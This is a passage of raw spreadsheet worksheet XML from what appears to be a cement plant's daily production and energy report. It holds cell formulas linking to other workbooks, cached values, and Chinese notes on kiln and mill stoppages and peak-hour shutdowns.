        <f>X42+yc!Y42</f>
        <v>211967</v>
      </c>
      <c r="Z42" s="238">
        <f>'[11]15'!$Y$8</f>
        <v>8610.516</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>'[12]15'!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>'[12]15'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'14'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>'[12]15'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'14'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>'[12]15'!$L$14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'[12]15'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'14'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>'[12]15'!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'14'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>'[12]15'!$L$15</f>
        <v>60936.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>'[11]15'!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>'[11]15'!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>'[11]15'!$R$29</f>
        <v>697.02</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'14'!U44</f>
        <v>5257</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>70010.168</v>
      </c>
      <c r="W44" s="235">
        <f>'[11]15'!$V$29</f>
        <v>131</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'14'!X44</f>
        <v>2770</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>69180</v>
      </c>
      <c r="Z44" s="238">
        <f>'[11]15'!$Y$29</f>
        <v>4786.457</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>'[12]15'!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'14'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>'[12]15'!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'14'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>'[11]15'!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>'[11]15'!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>'[11]15'!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>'[11]15'!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>'[11]15'!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>'[11]15'!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>'[11]15'!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>'[11]15'!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>'[11]15'!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'14'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'14'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>'[12]15'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>'[12]15'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>'[12]15'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'14'!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>'[12]15'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'14'!X46</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>'[12]15'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'14'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'14'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>'[12]15'!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>'[12]15'!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>'[12]15'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'14'!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>'[12]15'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'14'!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>'[12]15'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'14'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'14'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>'[12]15'!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>'[12]15'!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>'[12]15'!$R$34</f>
        <v>255.77</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'14'!U48</f>
        <v>555.83</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>6582.36</v>
      </c>
      <c r="W48" s="235">
        <f>'[12]15'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'14'!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>'[12]15'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'14'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'14'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>'[13]15'!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>'[13]15'!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>'[13]15'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'14'!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>'[13]15'!$V$8</f>
        <v>131.16</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'14'!X49</f>
        <v>143.06</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>176673.4</v>
      </c>
      <c r="Z49" s="238">
        <f>'[13]15'!$Y$8</f>
        <v>10450.565</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'14'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'14'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>'[13]15'!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>'[13]15'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>'[13]15'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'14'!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>'[13]15'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'14'!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>'[13]15'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>'[13]15'!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>'[13]15'!$E$24</f>
        <v>3161</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'14'!H51</f>
        <v>72884.81</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1449283.81</v>
      </c>
      <c r="J51" s="194">
        <f>'[13]15'!$I$24</f>
        <v>4942.355</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'14'!K51</f>
        <v>74067.615</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1437191.546</v>
      </c>
      <c r="M51" s="194">
        <f>'[13]15'!$L$24</f>
        <v>47516.0689999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>105.591264444444</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>'[13]15'!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>'[13]15'!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>'[13]15'!$R$30</f>
        <v>222.79</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'14'!U51</f>
        <v>3224.12</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>66222.591</v>
      </c>
      <c r="W51" s="235">
        <f>'[13]15'!$V$30</f>
        <v>137</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'14'!X51</f>
        <v>3083.688</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>63699.925</v>
      </c>
      <c r="Z51" s="238">
        <f>'[13]15'!$Y$30</f>
        <v>3391.80600000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]15'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]15'!$E$19</f>
        <v>384.86000000002</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'14'!H52</f>
        <v>384.8600000003</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1383952.11</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]15'!$I$19</f>
        <v>2604.145</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'14'!K52</f>
        <v>69614.183</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1351308.383</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]15'!$L$19</f>
        <v>35817.1200000505</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>24.7014620690003</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'[13]15'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]15'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'14'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]15'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'14'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]15'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]15'!$M$21+'[14]15'!$M$22+'[14]15'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]15'!$N$21+'[14]15'!$N$22+'[14]15'!$N$35</f>
        <v>44.42</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'14'!U53</f>
        <v>772.94</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>39107.367</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]15'!$Q$21+'[14]15'!$Q$22+'[14]15'!$Q$35</f>
        <v>46</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'14'!X53</f>
        <v>739</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>40230</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]15'!$T$21+'[14]15'!$T$22+'[14]15'!$T$35</f>
        <v>1682.887</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]15'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'14'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]15'!$I$47</f>
        <v>0</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'14'!K54</f>
        <v>10672.645</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>222114.495</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]15'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]15'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]15'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]15'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'14'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]15'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'14'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]15'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]15'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'14'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]15'!$I$63</f>
        <v>127.145</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'14'!K55</f>
        <v>4273.998</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>39709.648</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]15'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]15'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]15'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]15'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]15'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]15'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]15'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]15'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]15'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'14'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'14'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]15'!$Q$62</f>
        <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：10:00-22:40避峰停机；2#磨：10:00-22:20避峰停机；3#磨：10:00-22:20避峰停机；4#磨：10:00-22:20避峰停机。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G57+'14'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'14'!K57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G58+'14'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'14'!K58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G59+'14'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'14'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]15'!$Q$65</f>
        <v>窑:正常。A组磨：8:40-24:00避峰停机。D1#磨：15:00-24:00避峰停机，D2#磨：15:00-24:00避峰停机。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G60+'14'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'14'!K60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'[14]15'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]15'!$E$6</f>
        <v>3560</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'14'!H61</f>
        <v>54448</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1170321</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]15'!$E$21</f>
        <v>3621.82</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'14'!K61</f>
        <v>58645.8</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1159805.88</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]15'!$H$6</f>
        <v>33571.3699999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>64.5603269230767</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'[14]15'!$M$11+'[14]15'!$M$12+'[14]15'!$M$13+'[14]15'!$M$14+'[14]15'!$M$15+'[14]15'!$M$16+'[14]15'!$M$17+'[14]15'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]15'!$N$11+'[14]15'!$N$12+'[14]15'!$N$13+'[14]15'!$N$14+'[14]15'!$N$15+'[14]15'!$N$16+'[14]15'!$N$17+'[14]15'!$N$18</f>
        <v>1876</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'14'!H62</f>
        <v>38592</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>874585.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]15'!$Q$11+'[14]15'!$Q$12+'[14]15'!$Q$13+'[14]15'!$Q$14+'[14]15'!$Q$15+'[14]15'!$Q$16+'[14]15'!$Q$17+'[14]15'!$Q$18</f>
        <v>2563</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'14'!K62</f>
        <v>39203</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>873675.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]15'!$T$11+'[14]15'!$T$12+'[14]15'!$T$13+'[14]15'!$T$14+'[14]15'!$T$15+'[14]15'!$T$16+'[14]15'!$T$17+'[14]15'!$T$18</f>
        <v>17843.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>71.3745359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]15'!$Q$71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'[14]15'!$M$19+'[14]15'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]15'!$N$19+'[14]15'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'14'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]15'!$Q$19+'[14]15'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'14'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]15'!$T$19+'[14]15'!$T$20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G64+'14'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'14'!K64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G65+'14'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'14'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]15'!$Q$74</f>
        <v>1#窑:续停；2#窑:10:58窑投料，13:51-24:00抢修窑尾托轮轴瓦高温（机械）；1#磨:4:35-24:00库满停机。2#磨:4:35-24:00库满停机。3#磨:8:00-24:00避峰停机。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G66+'14'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'14'!K66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G67+'14'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'14'!K67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'[15]15'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]15'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
